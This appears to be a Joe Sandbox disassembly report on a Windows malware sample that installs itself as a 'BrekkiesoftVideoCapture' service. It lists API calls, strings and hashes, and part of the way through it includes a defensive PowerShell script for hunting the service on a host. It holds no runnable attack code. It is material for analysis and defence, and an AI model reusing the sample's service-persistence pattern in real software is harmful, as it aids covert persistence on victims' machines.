• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
• String ID:
• API String ID: 326482775-0
APIs
• StartServiceCtrlDispatcherA.ADVAPI32 ref: 004016E7
• GlobalFree.KERNEL32 ref: 0040236F
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: CtrlDispatcherFreeGlobalServiceStart
• String ID:
• API String ID: 1891229664-0
APIs
• sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
• sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_mutex_entersqlite3_mutex_leave
• String ID:
• API String ID: 1477753154-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,02C13B06,?,?,?,00000001), ref: 02C180ED
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02C180F6
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
  • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
• sqlite3_mutex_leave.SQLITE3 ref: 60925508
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_logsqlite3_mutex_leave
• String ID:
• API String ID: 1465156292-0
APIs
• _memset.LIBCMT ref: 02C0E874
  • Part of subcall function 02C0E6FB: _memmove.LIBCMT ref: 02C0E7B9
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: _memmove_memset
• String ID:
• API String ID: 3555123492-0
APIs
• CreateServiceA.ADVAPI32(?,?,?,000F01FF,00000010,00000002), ref: 0040207A
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: CreateService
• String ID:
• API String ID: 1592570254-0
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• sqlite3_initialize.SQLITE3 ref: 6096C5BE
  • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
• sqlite3_log.SQLITE3 ref: 6096C5FC
• sqlite3_free.SQLITE3 ref: 6096C67E
• sqlite3_free.SQLITE3 ref: 6096CD71
• sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
• sqlite3_errcode.SQLITE3 ref: 6096CD88
• sqlite3_close.SQLITE3 ref: 6096CD97
• sqlite3_create_function.SQLITE3 ref: 6096CDF8
Strings
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
• String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
• API String ID: 1320758876-2501389569
APIs
• sqlite3_free.SQLITE3 ref: 609264C9
• sqlite3_free.SQLITE3 ref: 60926526
• sqlite3_free.SQLITE3 ref: 6092652E
• sqlite3_free.SQLITE3 ref: 60926550
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
  • Part of subcall function 6090AFF5: sqlite3_free.SQLITE3 ref: 6090B09A
• sqlite3_free.SQLITE3 ref: 60926626
• sqlite3_win32_mbcs_to_utf8.SQLITE3 ref: 6092662E
• sqlite3_free.SQLITE3 ref: 60926638
• sqlite3_snprintf.SQLITE3 ref: 6092666B
• sqlite3_free.SQLITE3 ref: 60926673
• sqlite3_snprintf.SQLITE3 ref: 609266B8
Strings
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
• String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
• API String ID: 937752868-2111127023
                                                                                                                                        • Opcode ID: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                                                                        • Instruction ID: 28f04709130b2e8b140c84fcd32bad5e17fba194e1ccee1aab8ced89c5ccf9cf
                                                                                                                                        • Opcode Fuzzy Hash: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                                                                        • Instruction Fuzzy Hash: EA712E706183058FE700AF69D88465DBFF6AFA5748F00C82DE8999B314E778C845DF92
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                                                                                        • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                                                                                        • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                                                                                        • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                                                                                        • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                                                                                        • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                                                                                        • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                                                                                        • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                                                                                        • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                                                                                        • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                                                                                        • BEGIN;, xrefs: 609485DB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_log
                                                                                                                                        • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                                                                                        • API String ID: 632333372-52344843
                                                                                                                                        • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                                                                        • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                                                                                        • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                                                                        • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C01D11
                                                                                                                                        • GetLastError.KERNEL32 ref: 02C01D23
                                                                                                                                          • Part of subcall function 02C01712: __EH_prolog.LIBCMT ref: 02C01717
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C01D59
                                                                                                                                        • GetLastError.KERNEL32 ref: 02C01D6B
                                                                                                                                        • __beginthreadex.LIBCMT ref: 02C01DB1
                                                                                                                                        • GetLastError.KERNEL32 ref: 02C01DC6
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C01DDD
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C01DEC
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C01E14
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C01E1B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                                                                        • String ID: thread$thread.entry_event$thread.exit_event
                                                                                                                                        • API String ID: 831262434-3017686385
                                                                                                                                        • Opcode ID: 29cddc1393703c6b3df7915938fafff75e991105983639e2ce39dc4f92fb6808
                                                                                                                                        • Instruction ID: eaba44e4b84dcb639aef2fca9743c5a47c6063c795ab10696089bb13474bee9e
                                                                                                                                        • Opcode Fuzzy Hash: 29cddc1393703c6b3df7915938fafff75e991105983639e2ce39dc4f92fb6808
                                                                                                                                        • Instruction Fuzzy Hash: 06316B719003119FD710EF24C888B2BBBA9FF84760F14492DF9598B295DBB09949CFD2
                                                                                                                                        APIs
                                                                                                                                        • SetServiceStatus.ADVAPI32(0040BE50), ref: 00401A02
                                                                                                                                        • SetEvent.KERNEL32 ref: 00401A0E
                                                                                                                                        • RegisterServiceCtrlHandlerA.ADVAPI32(BrekkiesoftVideoCapture,004019C8), ref: 00401A25
                                                                                                                                        • SetServiceStatus.ADVAPI32(0040BE50), ref: 00401A84
                                                                                                                                        • GetLastError.KERNEL32 ref: 00401A86
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00401A93
                                                                                                                                        • GetLastError.KERNEL32 ref: 00401AB4
                                                                                                                                        • SetServiceStatus.ADVAPI32(0040BE50), ref: 00401AE4
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00001897,00000000,00000000,00000000), ref: 00401AF0
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00401AF9
                                                                                                                                        • CloseHandle.KERNEL32 ref: 00401B05
                                                                                                                                        • SetServiceStatus.ADVAPI32(0040BE50), ref: 00401B2E
                                                                                                                                        Strings
                                                                                                                                        • BrekkiesoftVideoCapture, xrefs: 00401A20
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Service$Status$CreateErrorEventLast$CloseCtrlHandleHandlerObjectRegisterSingleThreadWait
                                                                                                                                        • String ID: BrekkiesoftVideoCapture
                                                                                                                                        • API String ID: 1078627318-4253525158
                                                                                                                                        • Opcode ID: 7d09e8eb5b8e8689bf8be5551a89009032285b618e14dbce3775e6d4680f83fd
                                                                                                                                        • Instruction ID: fe0e10fd94db48ca2312eac1d7ab5fb7f56e0f11cc9a60428dd088b60b76b330
                                                                                                                                        • Opcode Fuzzy Hash: 7d09e8eb5b8e8689bf8be5551a89009032285b618e14dbce3775e6d4680f83fd
                                                                                                                                        • Instruction Fuzzy Hash: 8531A9B1501384ABD710AF26EF48B967BB8EB95B56B11843AE241B23B1C7F90444CFDC
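The API sequence above is a conventional ServiceMain: RegisterServiceCtrlHandlerA registers a control handler for the service name BrekkiesoftVideoCapture, SetServiceStatus reports the state transitions, CreateThread starts the worker (Function_00001897) and WaitForSingleObject blocks until it exits. The service name is therefore a host-level indicator. The following PowerShell hunt script is an added example, not code from the report or from the sample; it assumes only that the same service name is registered on a live host, and treats the image path, start mode and service account as unknowns to be collected rather than facts the report states.

```powershell
# Added hunt example (not part of the Joe Sandbox report): locate the service whose
# name appears in the RegisterServiceCtrlHandlerA call above and collect the
# properties an incident responder needs before touching the host.
# Assumption: persistence on a live host is a Win32 service registered under the
# name seen in the report. Everything else (image path, account, start mode) is
# read from the host, not taken from the report.
$ServiceName = 'BrekkiesoftVideoCapture'

function Get-SuspectService {
    param([Parameter(Mandatory)][string]$Name)

    # Win32_Service exposes PathName, StartMode and StartName; Get-Service does not.
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'" -ErrorAction SilentlyContinue
    if (-not $svc) { return $null }

    # Reduce the raw PathName ("C:\path\x.exe" -arg or C:\path\x.exe) to the image path.
    $image = $svc.PathName -replace '^"([^"]+)".*$', '$1'
    if ($image -eq $svc.PathName) { $image = ($svc.PathName -split ' ')[0] }

    # Hash the image so it can be compared against the report's dropped-file hashes.
    $hash = $null
    if (Test-Path -LiteralPath $image) {
        $hash = (Get-FileHash -LiteralPath $image -Algorithm SHA256).Hash
    }

    [pscustomobject]@{
        Name      = $svc.Name
        State     = $svc.State
        StartMode = $svc.StartMode
        Account   = $svc.StartName
        ProcessId = $svc.ProcessId
        ImagePath = $image
        SHA256    = $hash
    }
}

$result = Get-SuspectService -Name $ServiceName
if ($null -eq $result) {
    "No service named '$ServiceName' is registered on $env:COMPUTERNAME."
} else {
    $result | Format-List

    # The registry key outlives a deleted binary, so record it as well.
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$ServiceName"
    if (Test-Path -LiteralPath $key) {
        Get-ItemProperty -LiteralPath $key |
            Select-Object ImagePath, Start, ObjectName, Description |
            Format-List
    }
}
```

Run it in an elevated session; Win32_Service returns the service account and process ID only with administrative rights. A hit should be confirmed by matching the reported SHA256 against the dropped-file hashes elsewhere in the report before the service is stopped, since the service name alone could in principle be reused by an unrelated binary.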
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C024E6
                                                                                                                                        • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02C024FC
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 02C0250E
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 02C0256D
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,771ADFB0), ref: 02C0257F
                                                                                                                                        • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,771ADFB0), ref: 02C02599
                                                                                                                                        • GetLastError.KERNEL32(?,771ADFB0), ref: 02C025A2
                                                                                                                                        • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C025F0
                                                                                                                                        • InterlockedDecrement.KERNEL32(00000002), ref: 02C0262F
                                                                                                                                        • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C0268E
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C02699
                                                                                                                                        • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02C026AD
                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,771ADFB0), ref: 02C026BD
                                                                                                                                        • GetLastError.KERNEL32(?,771ADFB0), ref: 02C026C7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1213838671-0
                                                                                                                                        • Opcode ID: d9fc150f63efa56501d39c3f1e1f614ece4b89a79cd229d5c7dcba23be05ba56
                                                                                                                                        • Instruction ID: 495c33b8d3ab09612313038029fe7a729e0527d7b91df4eadd37ad3a48e34736
                                                                                                                                        • Opcode Fuzzy Hash: d9fc150f63efa56501d39c3f1e1f614ece4b89a79cd229d5c7dcba23be05ba56
                                                                                                                                        • Instruction Fuzzy Hash: 1C614171900209EFCB24DFA4D8D8BAEBBB9FF48354F504519E916E7280DB309A44CFA1
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C04608
                                                                                                                                          • Part of subcall function 02C127C5: _malloc.LIBCMT ref: 02C127DD
                                                                                                                                        • htons.WS2_32(?), ref: 02C04669
                                                                                                                                        • htonl.WS2_32(?), ref: 02C0468C
                                                                                                                                        • htonl.WS2_32(00000000), ref: 02C04693
                                                                                                                                        • htons.WS2_32(00000000), ref: 02C04747
                                                                                                                                        • _sprintf.LIBCMT ref: 02C0475D
                                                                                                                                          • Part of subcall function 02C07991: _memmove.LIBCMT ref: 02C079B1
                                                                                                                                        • htons.WS2_32(?), ref: 02C046B0
                                                                                                                                          • Part of subcall function 02C0873C: __EH_prolog.LIBCMT ref: 02C08741
                                                                                                                                          • Part of subcall function 02C0873C: RtlEnterCriticalSection.NTDLL(00000020), ref: 02C087BC
                                                                                                                                          • Part of subcall function 02C0873C: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C087DA
                                                                                                                                          • Part of subcall function 02C01BA7: __EH_prolog.LIBCMT ref: 02C01BAC
                                                                                                                                          • Part of subcall function 02C01BA7: RtlEnterCriticalSection.NTDLL ref: 02C01BBC
                                                                                                                                          • Part of subcall function 02C01BA7: RtlLeaveCriticalSection.NTDLL ref: 02C01BEA
                                                                                                                                          • Part of subcall function 02C01BA7: RtlEnterCriticalSection.NTDLL ref: 02C01C13
                                                                                                                                          • Part of subcall function 02C01BA7: RtlLeaveCriticalSection.NTDLL ref: 02C01C56
                                                                                                                                          • Part of subcall function 02C0CEF8: __EH_prolog.LIBCMT ref: 02C0CEFD
                                                                                                                                        • htonl.WS2_32(?), ref: 02C0497C
                                                                                                                                        • htonl.WS2_32(00000000), ref: 02C04983
                                                                                                                                        • htonl.WS2_32(00000000), ref: 02C049C8
                                                                                                                                        • htonl.WS2_32(00000000), ref: 02C049CF
                                                                                                                                        • htons.WS2_32(?), ref: 02C049EF
                                                                                                                                        • htons.WS2_32(?), ref: 02C049F9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1645262487-0
                                                                                                                                        • Opcode ID: b3cf0c8ea8555968fcf62b232b9347c5c7e5f141c8b1d110776fade641049509
                                                                                                                                        • Instruction ID: 09769188f67d25a31f62e396e0518544ed810b737376b8c67020dae11d598a00
                                                                                                                                        • Opcode Fuzzy Hash: b3cf0c8ea8555968fcf62b232b9347c5c7e5f141c8b1d110776fade641049509
                                                                                                                                        • Instruction Fuzzy Hash: 7B024C71D00259EEEF29DFE4C884BEEBBB9AF08305F10455AE505B7280DB746A48DF61
                                                                                                                                        APIs
                                                                                                                                        • RtlDecodePointer.NTDLL(?), ref: 02C16EF8
                                                                                                                                        • _free.LIBCMT ref: 02C16F11
                                                                                                                                          • Part of subcall function 02C11F84: HeapFree.KERNEL32(00000000,00000000,?,02C14942,00000000,00000104,771B0A60), ref: 02C11F98
                                                                                                                                          • Part of subcall function 02C11F84: GetLastError.KERNEL32(00000000,?,02C14942,00000000,00000104,771B0A60), ref: 02C11FAA
                                                                                                                                        • _free.LIBCMT ref: 02C16F24
                                                                                                                                        • _free.LIBCMT ref: 02C16F42
                                                                                                                                        • _free.LIBCMT ref: 02C16F54
                                                                                                                                        • _free.LIBCMT ref: 02C16F65
                                                                                                                                        • _free.LIBCMT ref: 02C16F70
                                                                                                                                        • _free.LIBCMT ref: 02C16F94
                                                                                                                                        • RtlEncodePointer.NTDLL(008893E0), ref: 02C16F9B
                                                                                                                                        • _free.LIBCMT ref: 02C16FB0
                                                                                                                                        • _free.LIBCMT ref: 02C16FC6
                                                                                                                                        • _free.LIBCMT ref: 02C16FEE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3064303923-0
                                                                                                                                        • Opcode ID: ed3616f0fed5e5390543bb2ac9528b0acb3a620aba61a19f541aa7d6045d4c27
                                                                                                                                        • Instruction ID: 5692999397d4b0d46c38b1791389c7137dfa5ba767bb14403010de3676f2eb0f
                                                                                                                                        • Opcode Fuzzy Hash: ed3616f0fed5e5390543bb2ac9528b0acb3a620aba61a19f541aa7d6045d4c27
                                                                                                                                        • Instruction Fuzzy Hash: 1121B136D441119FCB349F24F8417457769EB4632532D4F2EE90897200CB7B9964EF90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                                                                          • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                                                                          • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                                                                          • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                                                                          • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                                                                          • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                                                                          • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                                                                        • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                                                                        • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60960618
                                                                                                                                        • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                         • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                         • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
